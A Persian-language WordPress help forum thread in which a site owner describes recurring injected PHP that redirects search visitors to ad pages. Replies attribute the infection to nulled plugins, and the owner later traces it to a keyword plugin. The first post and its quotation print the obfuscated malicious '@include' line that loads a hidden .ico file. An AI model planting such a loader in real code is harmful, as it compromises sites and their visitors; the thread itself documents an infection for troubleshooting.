انجمن


وجود کدهای مخرب در هاست و باز شدن صفحات تبلیغاتی  (۵ نوشته)

  • HESAM_DES

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲
    تشکر شده: ۱ بار
    # نوشته شده: ۶ سال پیش
    ۱۷ تیر ۱۳۹۷ - ۲۲:۰۳

    سلام دوستان. تو بد مخمصه ای گیر کردم ممنون میشم کمک کنید.
    چند روزیه که 3 خط کد در داخل یکسری فایل های PHP موجود در هاست به صورت خود به خود کپی میشه. که کدهاش حدوداً این شکلی هستند

    /*58b4c*/
    
    @include "57hom\145/as\145man\146i/p\165bli\143_ht\155l/w\160-in\143lud\145s/w\151dge\164s/.\145e7960b7756ico";
    
    /*58b4c*/

    یا مثلاً این یکی رو ببینید.
    http://uupload.ir/files/e_untitled-1.jpg
    هر وقت که این کدها رو از داخل فایل های PHPپاک می کنم باز روز بعد برمیگرده. و وقتی بر می گرده هر کاربری که از طریق گوگل وارد سایت بشه رو به یک صفحه تبلیغاتی هدایت می کنه. تبلیغاتی هم که به کاربر نشون داده میشه معمولاً فارسی هستند ولی تبلیغات انگلیسی هم داخلشون هست. مثلاً به یکی از این صفحات تبلیغاتی نگاه کنید.
    yon.ir/K8muP
    یکی از اون صفحاتی که خیلی بهش وصل میشه و تبلیغات اونجا به کاربر نشون داده میشه سایت ADS4C.COM هستش.
    بنده وردپرس رو به آخرین نسخه آپدیت کردم. و همه فایل های قبلی رو حذف کردم. همه افزونه ها و قالب رو هم غیر فعال کردم ولی باز این کدها برمیگردن و دوباره همون آش و همون کاسه.
    مدیر هاست تمام هاست رو هم ویروس کشی کرد ولی چیزی پیدا نشد.
    دیگه موندم چیکار کنم.
    بنده از این افزونه های زیر استفاده می کنم. شاید بتونه کمکتون کنه.
    yon.ir/dlDcU

    آدرس سایت بنده هم http://asemanfile.ir هستش.

  • kamalireal

    آفلاین
    استاد
    تعداد نوشته‌ها: ۲۵۶
    تشکر شده: ۹۹ بار
    # نوشته شده: ۶ سال پیش
    ۱۸ تیر ۱۳۹۷ - ۱۴:۲۱

    HESAM_DES گفت:
    سلام دوستان. تو بد مخمصه ای گیر کردم ممنون میشم کمک کنید.
    چند روزیه که 3 خط کد در داخل یکسری فایل های PHP موجود در هاست به صورت خود به خود کپی میشه. که کدهاش حدوداً این شکلی هستند

    /*58b4c*/
    
    @include "57hom\145/as\145man\146i/p\165bli\143_ht\155l/w\160-in\143lud\145s/w\151dge\164s/.\145e7960b7756ico";
    
    /*58b4c*/

    یا مثلاً این یکی رو ببینید.
    http://uupload.ir/files/e_untitled-1.jpg
    هر وقت که این کدها رو از داخل فایل های PHPپاک می کنم باز روز بعد برمیگرده. و وقتی بر می گرده هر کاربری که از طریق گوگل وارد سایت بشه رو به یک صفحه تبلیغاتی هدایت می کنه. تبلیغاتی هم که به کاربر نشون داده میشه معمولاً فارسی هستند ولی تبلیغات انگلیسی هم داخلشون هست. مثلاً به یکی از این صفحات تبلیغاتی نگاه کنید.
    yon.ir/K8muP
    یکی از اون صفحاتی که خیلی بهش وصل میشه و تبلیغات اونجا به کاربر نشون داده میشه سایت ADS4C.COM هستش.
    بنده وردپرس رو به آخرین نسخه آپدیت کردم. و همه فایل های قبلی رو حذف کردم. همه افزونه ها و قالب رو هم غیر فعال کردم ولی باز این کدها برمیگردن و دوباره همون آش و همون کاسه.
    مدیر هاست تمام هاست رو هم ویروس کشی کرد ولی چیزی پیدا نشد.
    دیگه موندم چیکار کنم.
    بنده از این افزونه های زیر استفاده می کنم. شاید بتونه کمکتون کنه.
    yon.ir/dlDcU

    آدرس سایت بنده هم http://asemanfile.ir هستش.

    درود .
    استفاده از قالب و افزونه های نال شده ، باعث بروز این مشکل می شوند .
    زمانی که اطلاعات شما آلوده می شوند ، با غیرفعال کردن افزونه و آپدیت وردپرس مشکلتان برطرف نمی شود .
    ترجیحا اگر تسلط به وردپرس ندارید ، اطلاعات را از 0 بارگذاری کنید .
    و مراحل زیر را برای امنیت بالاتر وردپرس خود انجام دهید :
    https://goo.gl/MmRQh8

    موفق باشید .

  • mansour9633

    آفلاین
    عضو
    تعداد نوشته‌ها: ۶
    # نوشته شده: ۶ سال پیش
    ۱۸ تیر ۱۳۹۷ - ۲۰:۰۹

    با هاستینگ جهت بررسی تماس بگیرید

  • HESAM_DES

    آفلاین
    عضو
    تعداد نوشته‌ها: ۲
    تشکر شده: ۱ بار
    # نوشته شده: ۵ سال پیش
    ۲۵ دی ۱۳۹۷ - ۱۶:۴۷

    سلام دوستان. بالاخره بعد از چند ماه تلاش موفق شدم که خودم این مشکل رو حل کنم.
    مشکل از افزونه ای بود که در داخل پوشه پلاگین بود، و چون فکر می کردم که اون رو از داشبورد وردپرس غیر فعال کردم، پس اگر مخرب هم باشه کاری نمی تونه بکنه.که ولی اشتباه می کردم.
    اسم اون افزونه، افزونه کلمات کلیدی برای وردپرس بود. که وقتی پوشه اون روکامل از پلاگین ها حذف کردم، مشکل حل شد.
    البته بعدش باید همه فایل های وردپرس رو مجدد نصب کنید.

    کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    Araz
  • Araz

    آفلاین
    کاربر فعال
    تعداد نوشته‌ها: ۱۵۰۴
    تشکر شده: ۹۱۰ بار
    # نوشته شده: ۵ سال پیش
    ۲۰ اسفند ۱۳۹۷ - ۰۱:۱۲

    بالاخره بعد از چند ماه تلاش موفق شدم که خودم این مشکل رو حل کنم

    اگر پلاگین فوق را از مخزن اصلی وردپرس (wordpress.org) نصب کرده اید، بهتر است آنرا گزارش کنید. درغیر اینصورت پلاگینی از دیگر سایت ها دانلود نکنید.

درباره‌ی این موضوع